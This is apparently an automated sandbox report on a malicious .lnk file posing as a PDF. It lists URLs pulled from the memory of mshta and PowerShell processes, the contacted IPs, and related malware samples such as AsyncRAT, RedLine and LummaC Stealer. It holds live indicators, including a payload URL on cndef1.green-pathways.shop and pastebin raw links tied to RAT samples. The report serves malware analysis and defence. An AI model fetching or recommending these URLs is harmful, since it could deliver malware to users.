                                              https://top.baidu.com/board?platform=pc&sa=pcindex_entrypowershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://oneget.orgXpowershell.exe, 00000007.00000002.2131766032.0000022C8023A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cndef1.gpowershell.exe, 00000004.00000002.2078120843.0000024FADBC7000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp459mshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cndef1.green-pathways.shop/api/reg/z.mp4Yimshta.exe, 00000005.00000003.2197047004.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2193156194.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205452333.0000029153A54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2085750541.0000018A0E696000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD7A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950C9C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4przqmshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2172223348.0000022C901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2172223348.0000022C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C805C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CB76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000007.00000002.2131766032.0000022C8023A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.baidu.compowershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://360.netpowershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp40mshta.exe, 00000005.00000003.2200411563.000002995A675000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://go.micropowershell.exe, 00000007.00000002.2131766032.0000022C8130C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950D3EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/Iconpowershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.ver)svchost.exe, 00000006.00000002.3313420291.000001FDFF284000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.microsoft.powershell.exe, 00000007.00000002.2183387067.0000022CF4021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://berb.fitnessclub-filmfanatics.compowershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://www.360.netpowershell.exe, 00000009.00000002.2356233458.000002950E7CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://pss.bdstatic.com/static/superman/font/iconfont-74fcdd51ab.svg#iconfontpowershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.wshifen.compowershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cndef1.green-pathways.shop/api/reg/z.mp4C:powershell.exe, 00000004.00000002.2080055561.0000024FC5720000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205299876.00000291539E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000009.00000002.2356233458.000002950CF2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E94C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.baidu.compowershell.exe, 00000009.00000002.2356233458.000002950E7CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cndef1.green-pathways.shop/api/reg/z.mp4332c3237382c3237392c3238302c3230302c3237302c3238352cmshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://cndef1.green-pathways.shop/apowershell.exe, 00000002.00000002.2085750541.0000018A0EB15000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4httpmshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
                                                                                  		high
                                                                                  https://cndef1.green-pathways.shop/api/reg/z.mp4werLMEMhxmshta.exe, 00000005.00000002.2208459188.000002995A4B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2192822020.000002995A4A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://cndef1.green-pathways.shop/api/reg/z.mp4ppowershell.exe, 00000004.00000002.2078120843.0000024FAD721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD86E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://cndef1.green-pathways.shop/api/reg/z.mp4owsPowerShelpowershell.exe, 00000004.00000002.2077226110.0000024FAB730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://cndef1.green-pathways.shop/mshta.exe, 00000005.00000003.2190556968.0000029153A92000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://cndef1.green-pathways.shop/api/reg/z.mp4mmshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://pss.bdstatic.com/static/superman/font/iconfont-cdfecb8456.eotpowershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cndef1.green-pathways.shop/api/reg/z.mp4imshta.exe, 00000005.00000002.2206174245.0000029153C10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://cndef1.green-pathways.shop/api/reg/z.mp4gmshta.exe, 00000005.00000003.2192577700.0000029153A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2197047004.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205452333.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2193156194.0000029153A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2085750541.0000018A0E669000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD73B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD77E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950C9C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://pss.bdstatic.com/static/superman/font/iconfont-cdfecb8456.eot?#iefixpowershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://pastebin.compowershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://cndef1.green-pathways.shop/api/reg/z.mp4hZmshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://pastebin.compowershell.exe, 00000009.00000002.2356233458.000002950DDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://oneget.orgpowershell.exe, 00000007.00000002.2131766032.0000022C8023A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              104.21.66.20
                                                                                              		berb.fitnessclub-filmfanatics.comUnited States
                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                              172.67.19.24
                                                                                              		pastebin.comUnited States
                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                              180.163.242.102
                                                                                              		360.netChina
                                                                                              		4812CHINANET-SH-APChinaTelecomGroupCNfalse
                                                                                              103.235.47.188
                                                                                              		www.wshifen.comHong Kong
                                                                                              		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                                                                                              104.21.83.229
                                                                                              		cndef1.green-pathways.shopUnited States
                                                                                              		13335CLOUDFLARENETUStrue

                                                                                              Private

                                                                                              IP
                                                                                              127.0.0.1

                                                                                              General Information

                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1576547
                                                                                              Start date and time:2024-12-17 08:47:09 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 6m 16s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:13
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.evad.winLNK@14/15@8/6
                                                                                              EGA Information:Failed
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 96%
                                                                                              • Number of executed functions: 27
                                                                                              • Number of non-executed functions: 2
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .lnk

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 52.149.20.212
                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target mshta.exe, PID 5416 because there are no executed function
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 408 because it is empty
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6568 because it is empty
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 984 because it is empty
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              02:48:06API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                              02:48:07API Interceptor134x Sleep call for process: powershell.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              172.67.19.24rrats.exeGet hashmaliciousAsyncRATBrowse
                                                                                              • pastebin.com/raw/KKpnJShN
                                                                                              sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                                                              • pastebin.com/raw/sA04Mwk2
                                                                                              cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                                                              • pastebin.com/raw/sA04Mwk2
                                                                                              cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                              • pastebin.com/raw/sA04Mwk2
                                                                                              cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                                                              • pastebin.com/raw/sA04Mwk2
                                                                                              VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                              • pastebin.com/raw/sA04Mwk2
                                                                                              HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                                              • pastebin.com/raw/sA04Mwk2
                                                                                              xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                                              • pastebin.com/raw/sA04Mwk2
                                                                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                              • pastebin.com/raw/sA04Mwk2
                                                                                              cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                              • pastebin.com/raw/sA04Mwk2
                                                                                              180.163.242.102Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                b6FArHy7yA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  103.235.47.188VIP-#U4f1a#U5458#U7248.exeGet hashmaliciousBlackMoonBrowse
                                                                                                  • www.baidu.com/
                                                                                                  Iifpj4i2kC.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.zruypj169g.top/md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA==
                                                                                                  3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                  • www.baidu.com/
                                                                                                  CZyOWoN2hiszA6d.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.vicmvm649n.top/v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd
                                                                                                  f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                  • www.baidu.com/
                                                                                                  f1.exeGet hashmaliciousUnknownBrowse
                                                                                                  • www.baidu.com/
                                                                                                  SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                                                                                                  • www.baidu.com/
                                                                                                  chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                  • www.baidu.com/
                                                                                                  LisectAVT_2403002A_489.exeGet hashmaliciousUnknownBrowse
                                                                                                  • www.baidu.com/
                                                                                                  d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                                  • www.baidu.com/

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  www.360.netSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 180.163.242.102
                                                                                                  b6FArHy7yA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 180.163.242.102
                                                                                                  Full_Setup_v24.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 180.163.246.86
                                                                                                  www.wshifen.com2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                  • 103.235.47.188
                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                  • 103.235.47.188
                                                                                                  Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 103.235.47.188
                                                                                                  b6FArHy7yA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 103.235.47.188
                                                                                                  VIP-#U4f1a#U5458#U7248.exeGet hashmaliciousBlackMoonBrowse
                                                                                                  • 103.235.46.96
                                                                                                  360safe.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 103.235.47.188
                                                                                                  XiaobingOnekey.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 103.235.46.96
                                                                                                  DNF#U604b#U62180224a.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 103.235.46.96
                                                                                                  http://profdentalcare.comGet hashmaliciousUnknownBrowse
                                                                                                  • 103.235.46.96
                                                                                                  Iifpj4i2kC.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 103.235.47.188
                                                                                                  360.netSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 180.163.242.102
                                                                                                  b6FArHy7yA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 180.163.242.102
                                                                                                  Full_Setup_v24.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 180.163.246.86
                                                                                                  wh2JzrnksHGet hashmaliciousUnknownBrowse
                                                                                                  • 180.163.246.86
                                                                                                  MCYq2AqNU0.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                                  • 218.213.216.154
                                                                                                  xqz8sQ4mZB.exeGet hashmaliciousGlupteba, SmokeLoaderBrowse
                                                                                                  • 218.213.216.3
                                                                                                  https://iop360.net/jsg2nGet hashmaliciousUnknownBrowse
                                                                                                  • 92.255.57.104
                                                                                                  Drawing & Company Profile.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 156.239.201.69
                                                                                                  REQUIREMENT.exeGet hashmaliciousGuLoader FormBookBrowse
                                                                                                  • 156.239.224.4
                                                                                                  cndef1.green-pathways.shopref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                  • 188.114.97.6
                                                                                                  Instruction_695-18112-002_Rev.PDF.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.83.229

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUSref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                  • 188.114.97.6
                                                                                                  payload_1.htaGet hashmaliciousRedLineBrowse
                                                                                                  • 104.21.87.65
                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 104.21.67.152
                                                                                                  bxAoaISZJQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.139.105
                                                                                                  ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.140.151
                                                                                                  tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.6
                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.67.152
                                                                                                  https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.18.11.207
                                                                                                  Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.32.1
                                                                                                  CLOUDFLARENETUSref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                  • 188.114.97.6
                                                                                                  payload_1.htaGet hashmaliciousRedLineBrowse
                                                                                                  • 104.21.87.65
                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 104.21.67.152
                                                                                                  bxAoaISZJQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.139.105
                                                                                                  ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.140.151
                                                                                                  tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.6
                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.67.152
                                                                                                  https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.18.11.207
                                                                                                  Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.32.1
                                                                                                  CHINANET-SH-APChinaTelecomGroupCNldr.ps1Get hashmaliciousGO Miner, XmrigBrowse
                                                                                                  • 124.78.167.193
                                                                                                  1.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 218.82.146.246
                                                                                                  236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 180.163.146.100
                                                                                                  arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 180.175.98.217
                                                                                                  mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                  • 61.129.76.153
                                                                                                  mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                  • 222.67.51.212
                                                                                                  https://stoss3.libooc.comGet hashmaliciousUnknownBrowse
                                                                                                  • 180.163.146.100
                                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 101.83.13.176
                                                                                                  arm.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 114.84.211.156
                                                                                                  ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 101.225.14.229

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0esEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                  • 104.21.66.20
                                                                                                  • 103.235.47.188
                                                                                                  • 172.67.19.24
                                                                                                  • 180.163.242.102
                                                                                                  ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                  • 104.21.66.20
                                                                                                  • 103.235.47.188
                                                                                                  • 172.67.19.24
                                                                                                  • 180.163.242.102
                                                                                                  payload_1.htaGet hashmaliciousRedLineBrowse
                                                                                                  • 104.21.66.20
                                                                                                  • 103.235.47.188
                                                                                                  • 172.67.19.24
                                                                                                  • 180.163.242.102
                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 104.21.66.20
                                                                                                  • 103.235.47.188
                                                                                                  • 172.67.19.24
                                                                                                  • 180.163.242.102
                                                                                                  ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.66.20
                                                                                                  • 103.235.47.188
                                                                                                  • 172.67.19.24
                                                                                                  • 180.163.242.102
                                                                                                  tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.66.20
                                                                                                  • 103.235.47.188
                                                                                                  • 172.67.19.24
                                                                                                  • 180.163.242.102
                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.66.20
                                                                                                  • 103.235.47.188
                                                                                                  • 172.67.19.24
                                                                                                  • 180.163.242.102
                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.66.20
                                                                                                  • 103.235.47.188
                                                                                                  • 172.67.19.24
                                                                                                  • 180.163.242.102
                                                                                                  https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.21.66.20
                                                                                                  • 103.235.47.188
                                                                                                  • 172.67.19.24
                                                                                                  • 180.163.242.102
                                                                                                  Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 104.21.66.20
                                                                                                  • 103.235.47.188
                                                                                                  • 172.67.19.24
                                                                                                  • 180.163.242.102
                                                                                                  37f463bf4616ecd445d4a1937da06e19sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                  • 104.21.83.229
                                                                                                  ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                  • 104.21.83.229
                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 104.21.83.229
                                                                                                  bxAoaISZJQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.83.229
                                                                                                  ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.83.229
